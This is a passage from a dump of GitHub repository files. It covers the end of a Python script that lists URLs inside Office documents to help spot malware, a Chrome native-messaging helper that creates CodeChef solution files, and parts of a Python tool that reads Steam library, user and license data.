r, d, f in os.walk(path):\n\tfor file in f:\n\t\tfiles.append(os.path.join(r, file))\n\ndomains=[]\n\nunusual_urls=[]\nsuspicious_urls=[]\nfor f in files:\n\tcurrent_urls=[]\n\tfp=open(f, \"rb\")\n\tcontent=fp.read()\n\tcontent=content.decode('latin1')\n\n\n\t#m = re.findall('\"(http[s]?://(?:[a-zA-Z]|[0-9]|[$\\-@\\.&+:/?=]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)\"', content)\n\t\n\tm = re.findall('([a-zA-Z]+://[^\"<\\'\\s]+)', content)\n\t\n\t#m = re.findall(r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\", content)\n\t#'''\n\t#extractor=URLExtract()\n\t#m=extractor.find_urls(content)\n\n\n\tprint(\"======= \"+f.split(random_string)[1]+\" =======\")\n\tfor url in m:\n\t\turl=url.encode('latin1')\n\t\turl=url.decode('utf-8')\n\t\tif url not in current_urls:\n\t\t\tcurrent_urls.append(url)\n\t\t\tprint(url)\n\t\t\ttry:\n\t\t\t\tdomain=url.split(\"//\")[1].split(\"/\")[0]\n\t\t\texcept:\n\t\t\t\tdomain=url\n\t\t\tif domain not in domains:\n\t\t\t\tdomains.append(domain)\n\t\t\tif domain not in common_domains:\n\t\t\t\tunusual_urls.append((f, url))\n\t\t\tfor word in suspicious_keywords:\n\t\t\t\tif word in url:\n\t\t\t\t\tsuspicious_urls.append((f, url))\n\t\t\t\t\tunusual_urls.append((f, url))\n\t\t\t\n\t\t\n\n\tprint(\"\")\n\tfp.close()\n\nprint(\"delete temporary files.\")\nprint(os.path.abspath(path))\nshutil.rmtree(path)\n\nprint(\"++++++++++++++++++++++ found domains ++++++++++++++++++++++\")\nfor domain in domains:\n\tprint(domain)\nprint(\"++++++++++++++++++++++ found domains ++++++++++++++++++++++\")\n\n\n\nif len(unusual_urls) != 0:\n\tprint(\"\\n\\n\\n\")\n\tprint(\"++++++++++++++++++++++ unusual urls ++++++++++++++++++++++\\n\")\n\tfor url in unusual_urls:\n\t\tprint(url[0].split(random_string)[1]+\":\\t\"+url[1])\n\tprint(\"\\n++++++++++++++++++++++ unusual urls ++++++++++++++++++++++\")\n\n\t\nif len(suspicious_urls) != 0:\n\tprint(\"\\n\\n\\n\")\n\tprint(\"++++++++++++++++++++++ suspicious urls ++++++++++++++++++++++\\n\")\n\tfor url in 
suspicious_urls:\n\t\tprint(url[0].split(random_string)[1]+\":\\t\"+url[1])\n\tprint(\"\\n++++++++++++++++++++++ suspicious urls ++++++++++++++++++++++\")\n\nprint(\"\\n\\n\\n\")\nprint(\"-----------------------------------------------------------------------------------\")\nprint(\"File name: \"+sys.argv[1])\nprint(\"-----------------------------------------------------------------------------------\")\n" }, { "alpha_fraction": 0.7106227278709412, "alphanum_fraction": 0.7106227278709412, "avg_line_length": 33.125, "blob_id": "4ce896e30cfed47e325ea016970503c7a8ecc58b", "content_id": "9dcdd3f2bcb97f1a36af538adaf3c10ec47db499", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 397, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/README.md", "repo_name": "ondolist/CheckOfficeSafety", "src_encoding": "UTF-8", "text": "# Check Office Safety\nA script, added to the Windows context menu, that helps you manually detect malware in Microsoft Office files (docx, pptx, xlsx...)</br>\n</br>\n## Required Python modules</br>\noletools</br>\n</br>\n## Usage</br>\nCopy a shortcut (.lnk file) to msoffice_analysis.bat into C:\\Users\\\\[user name]\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\n" } ]
2
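For quick orientation on the entry above: modern Office documents are ZIP archives, and url_extractor.py unpacks one (invoked as, e.g., `python url_extractor.py sample.docx`) and scans every part with a URL regex. Below is a self-contained illustration of the active pattern from that script; the relationship-XML snippet is invented for the demonstration.

```python
# Standalone demo of the URL pattern used in url_extractor.py; the XML
# snippet is a made-up example of what an OOXML part can contain.
import re

sample = '<Relationship Id="rId1" Target="https://example.com/payload" TargetMode="External"/>'
pattern = re.compile(r'([a-zA-Z]+://[^"<\'\s]+)')
print(pattern.findall(sample))  # -> ['https://example.com/payload']
```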
arjbholu/code-now-CodeChef
https://github.com/arjbholu/code-now-CodeChef
f819bf743b55a0ebe0d35c55fb3b8c1b1802f756
bc37f9cf9c784efc278624576c0ce901c85129bc
df10467e7ff6778ca84ed4752bc041538ad4ecfb
refs/heads/master
2020-12-26T01:38:55.196888
2015-07-15T06:13:03
2015-07-15T06:13:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6656668782234192, "alphanum_fraction": 0.6758648157119751, "avg_line_length": 26.327869415283203, "blob_id": "b3c2656536c54da1b6dc5158630cfea5e271d84d", "content_id": "fd721dfcb7584a8fb83d5042a2a785a3a91251a9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5001, "license_type": "permissive", "max_line_length": 257, "num_lines": 183, "path": "/host-program/install.sh", "repo_name": "arjbholu/code-now-CodeChef", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nROOT_UID=\"0\"\n\n#Check if run as root\nif [ \"$UID\" -eq \"$ROOT_UID\" ] ; then\n\techo \"Root Privileges Detected....!!\"\n\techo \"Please Run this script without root privileges\"\n\texit 127\nfi\n\n#Checking if Python is installed\nif hash python > /dev/null 2>&1;\nthen\n\techo \"Python Detected . . . . . . . . .\"\nelse\n\techo \"Python Not found !! Please install python and try again\"\n\techo \"Terminating ..........!!\"\n\texit 127\nfi\n\n#Checking if Google-Chrome is installed\nischrome=0\nif hash google-chrome > /dev/null 2>&1;\nthen\n\techo \"Google Chrome Detected . . . . . .\"\n\tischrome=1\nfi\n\n#Checking if Chromium Browser is installed\nischromium=0\nif hash chromium-browser > /dev/null 2>&1;\nthen\n\techo \"Chromium Browser Detected . . . . . .\"\n\tischromium=1\nfi\n\nif [ $ischrome -eq 0 ] && [ $ischromium -eq 0 ]\nthen\n\techo \"Neither Google Chrome nor Chromium was found !! Please download and install google chrome from https://www.google.com/chrome/browser/\"\n\techo \"Installation Incomplete\"\n\techo \"Terminating ............!!\"\n\texit 127\nfi\n\necho \"The installation folder comes with 3 template files for C, C++ and Java. All new code files will contain their respective templates. Use these template files to include/import all the required header files and classes. Enter Y or y if you want to continue:\"\n\nread choice\n\nif [ $choice != \"Y\" ] && [ $choice != \"y\" ]\nthen\n\techo \"Installation Incomplete ..........\"\n\techo \"Terminating ..............!!\"\n\texit 127\nfi\n\n#At this point all pre-requisites are met. Proceeding with installation\n\n# Reading the settings Parameter Here\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho \"Enter the IDE for C :\"\nread cide\nif hash $cide > /dev/null 2>&1;\nthen\n\techo \"$cide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $cide was found on your system !!\"\nfi\ndone\n\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho \"Enter the IDE for C++ :\"\nread cppide\nif hash $cppide > /dev/null 2>&1;\nthen\n\techo \"$cppide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $cppide was found on your system !!\"\nfi\ndone\n\nch=1\nwhile [ $ch -eq 1 ]\ndo\necho \"Enter the IDE for Java :\"\nread javaide\nif hash $javaide > /dev/null 2>&1;\nthen\n\techo \"$javaide was found on your system !! Successfully Configured ...........\"\n\tch=0\nelse\n\techo \"No software named $javaide was found on your system !!\"\nfi\ndone\n\nloop=1\nwhile [ $loop -eq 1 ]\ndo\n\techo \"Enter the path to the solution-folder (It will be created if it doesn't exist) : \"\n\tread sol_path\n\n\tif [[ -z $sol_path ]]\n\tthen\n\t\techo \"No Input Found !! Try Again\"\n\telif [ -f $sol_path ]\n\tthen\n\t\techo \"The Path Specified is a regular file!! 
Please enter path to a directory !!\"\n\telse\n\t\tmkdir -p $sol_path\n\t\tret=$?\n\t\tif [ $ret -ne 0 ]\n\t\tthen\n\t\t\techo \"Error in detecting/creating Directory !!\"\n\t\telif [ -w $sol_path ]\n\t\tthen\n\t\t\tloop=0\n\t\telse\n\t\t\techo \"The directory should have write permission !!\"\n\t\tfi\n\tfi\ndone\n\n#Creating Required Directories\n\nmkdir -p $HOME/.code-now > /dev/null 2>&1\nrm $HOME/.code-now/* > /dev/null 2>&1\n\n# Creating the JSON Manifest File\npath_dir=$HOME\nif [ $ischrome -eq 1 ]\nthen\n\tjson_file=\"$HOME/.config/google-chrome/NativeMessagingHosts/codenow.json\"\n\tif [ -f $json_file ]\n\tthen\n\t\trm $json_file\n\tfi\n\tinst_dir=\"$HOME/.config/google-chrome/NativeMessagingHosts\"\n\tif [ ! -d $inst_dir ]\n\tthen\n\t\tmkdir -p $inst_dir\n\tfi\n\t(cat codenow.json | sed -e \"s:PATH_TO_REQ_PROG:$path_dir/.code-now/prog.py:g\") > $HOME/.config/google-chrome/NativeMessagingHosts/codenow.json\nfi\n\nif [ $ischromium -eq 1 ]\nthen\n\tjson_file=\"$HOME/.config/chromium/NativeMessagingHosts/codenow.json\"\n\tif [ -f $json_file ]\n\tthen\n\t\trm $json_file\n\tfi\n\tinst_dir=\"$HOME/.config/chromium/NativeMessagingHosts\"\n\tif [ ! -d $inst_dir ]\n\tthen\n\t\tmkdir -p $inst_dir\n\tfi\n\t(cat codenow.json | sed -e \"s:PATH_TO_REQ_PROG:$path_dir/.code-now/prog.py:g\") > $HOME/.config/chromium/NativeMessagingHosts/codenow.json\nfi\n\necho \"JSON file created ..........................\"\n\n# Creating the prog.py script\ncp prog.py $path_dir/.code-now/prog.py\nsed \"s:DEFAULT_SOLUTION_PATH:$sol_path:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:JAVA_IDE:$javaide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:CPP_IDE:$cppide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nsed \"s:C_IDE:$cide:g\" $path_dir/.code-now/prog.py > $path_dir/.code-now/prog.py.tmp && mv $path_dir/.code-now/prog.py.tmp $path_dir/.code-now/prog.py\nchmod +x $path_dir/.code-now/prog.py\necho \"Python Script Created ......................\"\n\n# Copying the template files\ncp c_template.c $path_dir/.code-now/\ncp cpp_template.cpp $path_dir/.code-now/\ncp java_template.java $path_dir/.code-now/\necho \"Templates Copied............................\"\n\necho \"Installation Successful !! 
Please Install the extension\"\n" }, { "alpha_fraction": 0.5784105658531189, "alphanum_fraction": 0.5864853262901306, "avg_line_length": 32.23287582397461, "blob_id": "db49de62e7e3450c983483091074b6ef1e3ca124", "content_id": "86861b5a2ee15d3d8a40809c26ed509f707cda8c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2353, "license_type": "permissive", "max_line_length": 127, "num_lines": 73, "path": "/host-program/prog.py", "repo_name": "arjbholu/code-now-CodeChef", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# May God Bless Us All\n\nimport struct\nimport sys\nimport subprocess\nimport string\nimport re\nimport os\n\n# Helper function that sends a message to the chrome-plugin.\ndef send_message(message):\n    sys.stdout.write(struct.pack('I', len(message)))\n    sys.stdout.write(message)\n    sys.stdout.flush()\n\n# Function that reads messages from the chrome-plugin\ndef read_func():\n    while 1:\n        text_length_bytes = sys.stdin.read(4)\n        if len(text_length_bytes) == 0:\n            sys.exit(0)\n\n        text_length = struct.unpack('i', text_length_bytes)[0]\n\n        text = sys.stdin.read(text_length).decode('utf-8')\n\n        text = string.replace(text,\"problem_name\",\"\")\n        text = string.replace(text,\"problem_url\",\"\")\n        text = string.replace(text,\"user_name\",\"\")\n        text = string.replace(text,\"lang\",\"\")\n        text = string.replace(text,\"\\\"\\\":\\\"\",\"\")\n        text = string.replace(text,\"{\",\"\")\n        text = string.replace(text,\"}\",\"\")\n        text = string.replace(text,\"\\\"\",\"\")\n        info = string.split(text,\",\")\n\n        info[0] = re.sub('[ ]+', ' ', info[0])\n        filename = re.sub(' ', '_', info[0])\n        filename = \"DEFAULT_SOLUTION_PATH\" + os.sep + filename + \".\" + info[3]\n\n        if not os.path.isfile(filename) :\n            file_content = \"/*\\n\\tProblem Name = \" + info[0] + \"\\n\\tProblem Link = \" + info[1] + \"\\n\\tUser = \" + info[2] + \"\\n*/\\n\"\n            with open(os.path.join(os.path.dirname(__file__),info[3] + \"_template.\" + info[3]), \"r\") as myfile:\n                file_content = file_content + myfile.read()\n            fp = open(filename, \"w\")\n            fp.write(file_content)\n            fp.close()\n        \n        if info[3] == \"java\" :\n            try:\n                exit_code = subprocess.check_output(['JAVA_IDE', filename])\n            except subprocess.CalledProcessError, e:\n                send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\n        elif info[3] == \"cpp\" :\n            try:\n                exit_code = subprocess.check_output(['CPP_IDE', filename])\n            except subprocess.CalledProcessError, e:\n                send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\n        elif info[3] == \"c\" :\n            try:\n                exit_code = subprocess.check_output(['C_IDE', filename])\n            except subprocess.CalledProcessError, e:\n                send_message('{\"text\": \"Bad Settings. Please Reinstall !!\"}')\n\ndef Main():\n    read_func()\n    sys.exit(0)\nif __name__ == '__main__':\n    Main()\n" } ]
2
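A note on the entry above: prog.py is a Chrome native-messaging host, so it reads a 4-byte native-endian length prefix (struct format 'i'/'I') followed by a UTF-8 JSON payload on stdin. Below is a minimal sketch of the sending side, handy for exercising the host outside the browser; the payload values are made-up examples, while the keys mirror the ones read_func() strips out.

```python
# Sketch of the framing prog.py expects on stdin: 4-byte length, then JSON.
# Payload values are illustrative; keys match those handled in read_func().
import json
import struct
import sys

def frame(payload):
    body = json.dumps(payload).encode('utf-8')
    return struct.pack('I', len(body)) + body

message = {"problem_name": "Sample Problem", "problem_url": "http://example.com/p",
           "user_name": "someuser", "lang": "cpp"}
# Works on Python 2 (no .buffer attribute) and Python 3 (bytes go to .buffer)
getattr(sys.stdout, 'buffer', sys.stdout).write(frame(message))
```

Piping this script's output into prog.py should, under those assumptions, create Sample_Problem.cpp from the C++ template and open it in the configured IDE.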
shrewdlogarithm/pyst
https://github.com/shrewdlogarithm/pyst
0d4ab98b04addf0932d427aee2d42bb82190caea
a42b66c255c134c2402f49184a05bd45242a838d
bda85e5ce0392df7c02642b4d929013289b871db
refs/heads/master
2016-08-09T07:24:58.602963
2016-01-26T10:14:26
2016-01-26T10:14:26
44,608,427
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6638115644454956, "alphanum_fraction": 0.6680942177772522, "avg_line_length": 23.526315689086914, "blob_id": "ac0c37bcf234d40f5ccaf733db9b53341220ba02", "content_id": "0ff4569539c943c1b2f266b6ad3f309f3c3d428c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 467, "license_type": "no_license", "max_line_length": 113, "num_lines": 19, "path": "/loader/api.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import urllib2\nimport json\n\ndef getapi(logindata, gamedata, apidb):\n\tappids = \"\"\n\tfor appid in gamedata:\n\t\tif appids:\n\t\t\tappids += \",\"\n\t\tappids += appid\n\ttry:\n\t\tusock = urllib2.urlopen('http://steamtrayapi-steamtray.rhcloud.com/getappids?appids=' + appids + '&extra=true')\n\t\tapidata = json.load(usock)\n\t\tfor appid in apidata:\n\t\t\tapidb[appid] = {}\n\t\t\tfor k in apidata[appid]:\n\t\t\t\tapidb[appid][\"data-api-\"+k] = apidata[appid][k]\n\texcept:\n\t\tpass\n\t\t# api likely offline\n\n" }, { "alpha_fraction": 0.5430512428283691, "alphanum_fraction": 0.5472737550735474, "avg_line_length": 29.261110305786133, "blob_id": "1849f3809bda459271f0e49796a8a3c58b2a8530", "content_id": "8530627add3f1662d81c8b8ff2a305a8d0eedf9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5447, "license_type": "no_license", "max_line_length": 95, "num_lines": 180, "path": "/utils/vdf/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "\"\"\"\nModule for deserializing/serializing to and from VDF\n\"\"\"\n__version__ = \"1.10\"\n__author__ = \"Rossen Georgiev\"\n\nimport re\nimport sys\nfrom io import StringIO as unicodeIO\n\n# Py2 & Py3 compatibility\nif sys.version_info[0] >= 3:\n    string_type = str\n    BOMS = '\\ufffe\\ufeff'\n\n    def bomlen(line):\n        return len(line) - len(line.lstrip(BOMS))\nelse:\n    from cStringIO import StringIO as strIO\n    string_type = basestring\n    BOMS = '\\xef\\xbb\\xbf\\xff\\xfe\\xfe\\xff'\n    BOMS_UNICODE = '\\\\ufffe\\\\ufeff'.decode('unicode-escape')\n\n    def bomlen(line):\n        return len(line) - len(line.lstrip(BOMS if isinstance(line, str) else BOMS_UNICODE))\n\n\ndef parse(source, mapper=dict):\n    \"\"\"\n    Deserialize ``source`` (a ``str``, ``unicode``, or ``.read()``-supporting\n    file-like object containing a VDF) to a Python object.\n\n    ``mapper`` specifies the Python object used after deserialization. ``dict`` is\n    used by default. Alternatively, ``collections.OrderedDict`` can be used if you\n    wish to preserve key order. 
Or any object that acts like a ``dict``.\n    \"\"\"\n    if not issubclass(mapper, dict):\n        raise TypeError(\"Expected mapper to be a subclass of dict, got %s\" % type(mapper))\n    if hasattr(source, 'read'):\n        fp = source\n    elif isinstance(source, string_type):\n        try:\n            fp = unicodeIO(source)\n        except TypeError:\n            fp = strIO(source)\n    else:\n        raise TypeError(\"Expected source to be str or file-like object\")\n\n    # skip past BOMs\n    fp.seek(bomlen(fp.read(10)))\n\n    # init\n    stack = [mapper()]\n    expect_bracket = False\n\n    re_keyvalue = re.compile(r'^(\"(?P<qkey>(?:\\\\.|[^\\\\\"])+)\"|(?P<key>[a-z0-9\\-\\_]+))'\n                             r'([ \\t]*('\n                             r'\"(?P<qval>(?:\\\\.|[^\\\\\"])*)(?P<vq_end>\")?'\n                             r'|(?P<val>[a-z0-9\\-\\_]+)'\n                             r'))?',\n                             flags=re.I\n                             )\n\n    for line in fp:\n        line = line.lstrip()\n\n        # skip empty and comment lines\n        if line == \"\" or line[0] == '/':\n            continue\n\n        # one level deeper\n        if line[0] == \"{\":\n            expect_bracket = False\n            continue\n\n        if expect_bracket:\n            raise SyntaxError(\"vdf.parse: expected opening bracket\")\n\n        # one level back\n        if line[0] == \"}\":\n            if len(stack) > 1:\n                stack.pop()\n                continue\n\n            raise SyntaxError(\"vdf.parse: one too many closing parentheses\")\n\n        # parse keyvalue pairs\n        while True:\n            match = re_keyvalue.match(line)\n\n            if not match:\n                raise SyntaxError(\"vdf.parse: invalid syntax\")\n\n            key = match.group('key') if match.group('qkey') is None else match.group('qkey')\n            val = match.group('val') if match.group('qval') is None else match.group('qval')\n\n            # we have a key with value in parenthesis, so we make a new dict obj (level deeper)\n            if val is None:\n                stack[-1][key] = mapper()\n                stack.append(stack[-1][key])\n                expect_bracket = True\n\n            # we've matched a simple keyvalue pair, map it to the last dict obj in the stack\n            else:\n                # if the value spans more than one line, consume one more line and try\n                # to match again, until we get the KeyValue pair\n                if match.group('vq_end') is None and match.group('qval') is not None:\n                    line += next(fp)\n                    continue\n\n                stack[-1][key] = val\n\n            # exit the loop\n            break\n\n    if len(stack) != 1:\n        raise SyntaxError(\"vdf.parse: unclosed parenthesis or quotes\")\n\n    return stack.pop()\n\n\ndef loads(fp, **kwargs):\n    \"\"\"\n    Deserialize ``fp`` (a ``str`` or ``unicode`` instance containing a VDF)\n    to a Python object.\n    \"\"\"\n    assert isinstance(fp, string_type), \"Expected a str\"\n    return parse(fp, **kwargs)\n\n\ndef load(fp, **kwargs):\n    \"\"\"\n    Deserialize ``fp`` (a ``.read()``-supporting file-like object containing\n    a VDF) to a Python object.\n    \"\"\"\n    assert hasattr(fp, 'read'), \"Expected fp to have read() method\"\n    return parse(fp, **kwargs)\n\n\ndef dumps(data, pretty=False):\n    \"\"\"\n    Serialize ``data`` to VDF formatted ``str``.\n    \"\"\"\n    if not isinstance(data, dict):\n        raise TypeError(\"Expected data to be an instance of ``dict``\")\n    if not isinstance(pretty, bool):\n        raise TypeError(\"Expected pretty to be bool\")\n\n    return ''.join(_dump_gen(data, pretty))\n\n\ndef dump(data, fp, pretty=False):\n    \"\"\"\n    Serialize ``data`` as a VDF formatted stream to ``fp`` (a\n    ``.write()``-supporting file-like object).\n    \"\"\"\n    if not isinstance(data, dict):\n        raise TypeError(\"Expected data to be an instance of ``dict``\")\n    if not hasattr(fp, 'write'):\n        raise TypeError(\"Expected fp to have write() method\")\n\n    for chunk in _dump_gen(data, pretty):\n        fp.write(chunk)\n\n\ndef _dump_gen(data, pretty=False, level=0):\n    indent = \"\\t\"\n    line_indent = \"\"\n\n    if pretty:\n        line_indent = indent * level\n\n    for key, value in data.items():\n        if 
isinstance(value, dict):\n yield '%s\"%s\"\\n%s{\\n' % (line_indent, key, line_indent)\n for chunk in _dump_gen(value, pretty, level+1):\n yield chunk\n yield \"%s}\\n\" % line_indent\n else:\n yield '%s\"%s\" \"%s\"\\n' % (line_indent, key, value)\n" }, { "alpha_fraction": 0.6198257207870483, "alphanum_fraction": 0.6503267884254456, "avg_line_length": 27.6875, "blob_id": "a59f3c2c52a59fa778af5e8a325c7a62df0234f0", "content_id": "4b0123bd84c32eb6880f019a76ed0c7218a35651", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 918, "license_type": "no_license", "max_line_length": 114, "num_lines": 32, "path": "/loader/finduser.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\n\nimport utils\nfrom utils import vdf\n\n\ndef getuserconfig(steamhome):\n\n\tlatestuser = None\n\tlatesttime = 0\n\ttry:\n\t\tloginusers = vdf.load(open(os.path.join(steamhome[\"path\"],\"config\",\"loginusers.vdf\")))\n\t\tif \"users\" in loginusers:\n\t\t\tfor loginuser in loginusers[\"users\"]:\n\t\t\t\tsteamy = int(loginuser) - 76561197960265728\n\t\t\t\tsteamx = steamy % 2\n\t\t\t\tsteamy = (steamy-steamx)/2\n\t\t\t\t# steam2 = \"STEAM:_0:\" + str(steamx) + \":\" + str(steamy)\n\t\t\t\t# steam3 = \"U:1:\" + str(steamy*2+steamx)\n\t\t\t\tif \"Timestamp\" in loginusers[\"users\"][loginuser] and loginusers[\"users\"][loginuser][\"Timestamp\"] > latesttime:\n\t\t\t\t\tlatestuser = {\n\t\t\t\t\t\t\"id64\": loginuser,\n\t\t\t\t\t\t\"name\": loginusers[\"users\"][loginuser][\"PersonaName\"],\n\t\t\t\t\t \"account\": loginusers[\"users\"][loginuser][\"AccountName\"],\n\t\t\t\t\t \"dir\": str(steamy*2+steamx)\n\t\t\t\t\t}\n\t\t\t\t\tlatesttime = loginusers[\"users\"][loginuser][\"Timestamp\"]\n\n\texcept:\n\t\tpass\n\n\treturn latestuser\n" }, { "alpha_fraction": 0.6370997428894043, "alphanum_fraction": 0.6440927386283875, "avg_line_length": 22.230770111083984, "blob_id": "a3f8e8a3d078109a32d8e939c4634c89ef51b5e7", "content_id": "b694f5ac970afaeee3976d7a40c0837c952f485e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2717, "license_type": "no_license", "max_line_length": 109, "num_lines": 117, "path": "/utils/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport time\nimport operator\nfrom threading import Thread\n\n# Steam stuff\nsteamapps = [\"steamapps\",\"SteamApps\"]\n\ndef getprofileurl(logindata):\n\tprofileurl = \"http://steamcommunity.com\"\n\tif \"id64\" in logindata:\n\t\tprofileurl += \"/profiles/\" + logindata[\"id64\"]\n\telse:\n\t\tprofileurl += \"/id/\" + logindata[\"name\"]\n\treturn profileurl\n\n# thread stuff\nclass RunAsync(Thread):\n\tdef __init__(self, event, action,delay):\n\t\tThread.__init__(self)\n\t\tself.stopped = event\n\t\tself.delay = delay\n\t\tself.action = action\n\n\tdef run(self):\n\t\twhile not self.stopped and self.delay:\n\t\t\tself.action()\n\t\t\ttime.sleep(self.delay)\n\n# utility functions\ndef merge(a, b, path=None):\n\t\"merges b into a\"\n\tif path is None: path = []\n\tfor key in b:\n\t\tif key in a:\n\t\t\tif isinstance(a[key], dict) and isinstance(b[key], dict):\n\t\t\t\tmerge(a[key], b[key], path + [str(key)])\n\t\t\telif not isinstance(a[key], unicode) and not isinstance(b[key], unicode): # don't try if either is unicode\n\t\t\t\tif a[key] < b[key]:\n\t\t\t\t\ta[key] = b[key]\n\t\telse:\n\t\t\ta[key] = b[key]\n\treturn a\n\ndef zerowidthsplit(pattern, string):\n\tsplits = 
list(m.start() for m in re.finditer(pattern, string))\n\tstarts = [0] + splits\n\tends = splits + [len(string)]\n\treturn [string[start:end] for start, end in zip(starts, ends)]\n\n\ndef getnum(ust):\n\tst = ust.rstrip(\"\\0\")\n\tpo = 0\n\tnu = 0\n\tfor s in reversed(st):\n\t\tnu *= 256\n\t\tnu += ord(s)\n\treturn str(nu)\n\ndef stripquotes(val):\n\treturn val.replace(\"'\",\"\").replace('\"','')\n\ndef jsontocsv(gamelist):\n\tdef adddata(addto,val):\n\t\tif addto:\n\t\t\taddto += '\",\"'\n\t\telse:\n\t\t\taddto += '\"'\n\t\tif isinstance(val,dict):\n\t\t\tpass\n\t\telif isinstance(val,int) or isinstance(val,long) or isinstance(val,float):\n\t\t\taddto += str(val)\n\t\telse:\n\t\t\tval = stripquotes(val)\n\t\t\taddto += val\n\t\treturn addto\n\tgamelistexpdicts = {}\n\tfor g in gamelist:\n\t\tgamelistexpdicts[g] = {}\n\t\tfor c in gamelist[g]:\n\t\t\tif isinstance(gamelist[g][c],dict):\n\t\t\t\tfor cd in gamelist[g][c]:\n\t\t\t\t\tgamelistexpdicts[g][c+\"-\"+cd] = gamelist[g][c][cd]\n\t\t\telse:\n\t\t\t\tgamelistexpdicts[g][c] = gamelist[g][c]\n\tcols = {}\n\tfor g in gamelistexpdicts:\n\t\tfor c in gamelistexpdicts[g]:\n\t\t\tif c not in cols:\n\t\t\t\tcols[c] = 0\n\t\t\tcols[c] = cols[c] + 1\n\tcolssort = sorted(cols.items(), key=operator.itemgetter(1))\n\tcolssort.reverse()\n\tcsv = []\n\tlabels = u\"\"\n\tfor c in colssort:\n\t\tlabels = adddata(labels,c[0])\n\tcsv.append((labels + '\"').encode(\"UTF-8\"))\n\tfor g in gamelistexpdicts:\n\t\tvals = u\"\"\n\t\tfor c in colssort:\n\t\t\tif c[0] in gamelistexpdicts[g]:\n\t\t\t\tvals = adddata(vals,gamelistexpdicts[g][c[0]])\n\t\t\telse:\n\t\t\t\tvals = adddata(vals,u\"\")\n\t\tcsv.append((vals + '\"').encode(\"UTF-8\"))\n\treturn csv\n\n# debug/error message handling\ndebug = True\ndef debuglog(v):\n\tif debug:\n\t\tprint v\n\telse:\n\t\tpass\n\t\t# todo write to file?" 
}, { "alpha_fraction": 0.6732869744300842, "alphanum_fraction": 0.6792452931404114, "avg_line_length": 41, "blob_id": "42df44aa4a9e22e4f65d5108a2eb222064467ea7", "content_id": "28d4517afb6c4c46026257fb4cc6edf6be504cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1007, "license_type": "no_license", "max_line_length": 96, "num_lines": 24, "path": "/loader/purchased.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport datetime\nimport time\nimport os\n\ndef getpurchased(logindata):\n\tpurchaseinfo = {}\n\tusearch = re.compile(\"Logging in user '([^']+)' to Steam Public\")\n\tpsplit = re.compile(\"([0-9]+):[\\s\\S]+?Purchased : (.*) in\")\n\tfor root, subFolders, files in os.walk(\"..\"): # todo cheating as this is above 'web' but messy?\n\t\tfor file in files:\n\t\t\tif file.lower().endswith(\".lic\"):\n\t\t\t\tlicensefile = open(os.path.join(root,file))\n\t\t\t\tlicensedata = licensefile.read().decode(\"UTF-8\")\n\t\t\t\tusername = usearch.search(licensedata).group(1)\n\t\t\t\tif username == logindata[\"account\"]:\n\t\t\t\t\tfor license in licensedata.split(\"License packageID\"):\n\t\t\t\t\t\tpurchasedata = psplit.search(license)\n\t\t\t\t\t\tif purchasedata is not None:\n\t\t\t\t\t\t\tpurchasetime = datetime.datetime.strptime(purchasedata.group(2),\"%a %b %d %H:%M:%S %Y\")\n\t\t\t\t\t\t\tpurchaseinfo[purchasedata.group(1)] = time.mktime(purchasetime.timetuple())\n\t\t\t\tlicensefile.close()\n\t\t\t\tos.rename(os.path.join(root,file),os.path.join(root,file + \".old\"))\n\treturn purchaseinfo" }, { "alpha_fraction": 0.6298600435256958, "alphanum_fraction": 0.643856942653656, "avg_line_length": 24.760000228881836, "blob_id": "e572be4812c7e7768083c587d01300fe712ad616", "content_id": "9a9275f123a7c9bef2fa530e3de32fdcee1da802", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 643, "license_type": "no_license", "max_line_length": 84, "num_lines": 25, "path": "/loader/steamhome.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport platform\n\ndef getpath():\n\tplat = 